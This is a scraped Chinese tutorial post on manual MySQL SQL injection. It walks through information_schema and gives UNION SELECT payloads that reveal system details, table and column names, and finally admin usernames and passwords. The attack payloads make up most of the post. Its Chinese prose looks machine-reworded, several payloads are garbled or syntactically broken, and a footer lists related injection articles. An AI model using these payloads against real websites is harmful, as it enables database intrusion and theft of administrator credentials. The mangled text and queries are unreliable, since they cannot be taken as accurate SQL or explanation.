mysql 盲注_mysql简略手工盲注技能
mysql简略手工盲注技能
申明:固然网上对于mysql手工盲注的材料良多 然而大多都是大篇幅 语句极其庞杂
学习盲注前先懂得下 IFORMATION_SCHEMA 库
Mysql5内置的系统数据库IFORMATION_SCHEMA,其构造如MSSQL中的master数据库,其中记载了Mysql中所有
存在数据库名、数据库表、表字段。重点请求研讨多少个对SQL注入有用的数据表阐明。
1.得到所有数据库名:
'SCHEMATA 存储数据库名的表
'字段:SCHEMA_NAME 数据库名称
'TABLES 存储表名
'字段:TABLE_SCHEMA 表现该表名属于哪个数据库名
'字段:TABLE_NAME 存储表的表名
'COLUMNS 存储的字段名表
'字段:TABLE_SCHEMA 该字段所属数据库名
'字段:TABLE_NAME 存储所属表的名称
'字段:COLUMN_NAME 该字段的名称
###########################################################################
0x001 获取系统信息:
union select 1,2,3,4,5,concat(global.version_pile_os,0x3c62723e,datadir,0x3c62723e,user(),0x3c62723e,version()da tabase(),0x3c62723e,database()),7,8,9 /.
/.
global.version_pile_os 获取体系版本
datadir 数据库门路
database() 当前数据库名称
0x3c62723e 换行HEX值
./
######################################################################
0x002 获取表名
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema0x67617264656e /.
/.
0x67617264656e 为当前数据库名
group_concat(table_name) 应用group_concat函数 一步获得该库所有表名
./
######################################################################
0x003 获取字段
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name0x61646d696e and table_schema0x67617264656e limit 1 /.
/.
group_concat(column_name) 同样是 一口吻 取得该表0x61646d696e所有字段
0x61646d696e 抉择一个表
0x67617264656e 数据库名
./
#####################################################################
0x004 获取数据
union select 1,2,3
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
/.
0x3c62723e 换行符,HEX编码
group_concat 同时失掉该字段所有数据
./
BY:nginxshell
阅读(388) | 评论(0) | 转发(0) |
0
上一篇:没有了
下一篇:没有了
mysql 盲注_mysql简略手工盲注技能相关推荐
- mysql盲注_Mysql 布尔型盲注手工注入详解
0x00 什么叫布尔型盲注 布尔型 布尔(Boolean)型是计算机里的一种数据类型,只有True(真)和False(假)两个值.一般也称为逻辑型. 盲注 在注入时页面无具体数据返回的注入称之为盲注, ...
- sql mysql 手注_mysql注入漏洞手注
mysql: 报错注入: 以http://www.hexie.com/main/articleDetail.php?id=757 为例子: http://www.hexie.com/main/arti ...
- mysql注入大全_mysql注入大全及防御
0.明白存在的位置:get型 post型 cookie型 http头注入 1.先测试注入点,注册框.搜索框.地址栏啥的,判断是字符型,搜索型还是数字型 字符型 1' and '1'='1 成功, 1' ...
- dos环境下mysql的访问_MYSQL dos环境下使用
有很多朋友虽然安装好了mysql但却不知如何使用它.在这篇文章中我们就从连接MYSQL.修改密码.增加用户等方面来学习一些MYSQL的常用命令.一.连接MYSQL.格式: mysql -h主机地址 - ...
- 学生的新增mySQL文档_MySQL增删改查
连接命令:mysql -h[主机地址] -u[用户名] -p[用户密码] 创建数据库:create database [库名] 显示所有数据库: show databases; 打开数据库:use [ ...
- mysql 用户命令_MySQL命令行新建用户
https://www.cnblogs.com/penciler/p/4813157.html MySQL命令行能否实现新建用户呢?答案无疑是肯定的.而且在使用使用MySQL命令行新建用户后,还可以为 ...
- mysql操作总结_mysql常用操作总结大全
一.总结一下: 1.Linux系统下启动MySQL的命令: mysqladmin start /ect/init.d/mysql start (前面为mysql的安装路径) 2.linux下重启mys ...
- mysql aa复制_MySQL的复制架构与优化
MySQL的复制架构与优化 ###########原理########### 1.主服务器将更新的数据的sql语句(例如,insert,update,delete等)写入到 二进制文件中(由log-b ...
- mysql 角色管理_MySQL 8 用户和角色管理入门
MySQL 8.0 正式版目前已发布,MySQL 8.0 增加了很多新的功能,具体可参考「MySQL 8.0 正式版 8.0.11 发布!」一文. MySQL 8.0 在用户管理方面增加了角色管理,默 ...
最新文章
- Java中利用socket实现简单的服务端与客户端的通信(中级)——实现任意双向通信
- 速卖通物流发货怎么操作?“解读”重点国家市场物流状况
- P5137-polynomial【倍增】
- javafx 动画没效果_通过JavaFX标注制作动画效果
- 使用djcproxy创建代理对象
- android 模拟器方向键,键盘操控使用方法
- Ansible条件测试
- Docker简介(转)
- libevent c++高并发网络编程_高并发-网络I/O
- Java JDK下载与安装教程
- edge浏览器登录谷歌账号显示此浏览器或应用可能不安全
- 隐藏计算机文件夹中,电脑高手教你如何隐藏文件夹的方法
- 第26讲—项目6—存款利息计算器
- 顶级程序员常用的 14 个开源框架,YYDS!
- uc神马推广一年多少钱,uc信息流推广一个月要多少钱
- Excel VBA中的If,Select循环语句
- 华云大咖说 | 安超虚拟化平台全“芯”亮点揭秘
- 《Python深度学习》读书笔记:第1章 什么是深度学习
- 花点时间自己DIY一款心仪的App
- matlab时间转为数字,如何将日期数组(格式'mm/dd/yy HH:MM:SS')转换为数字?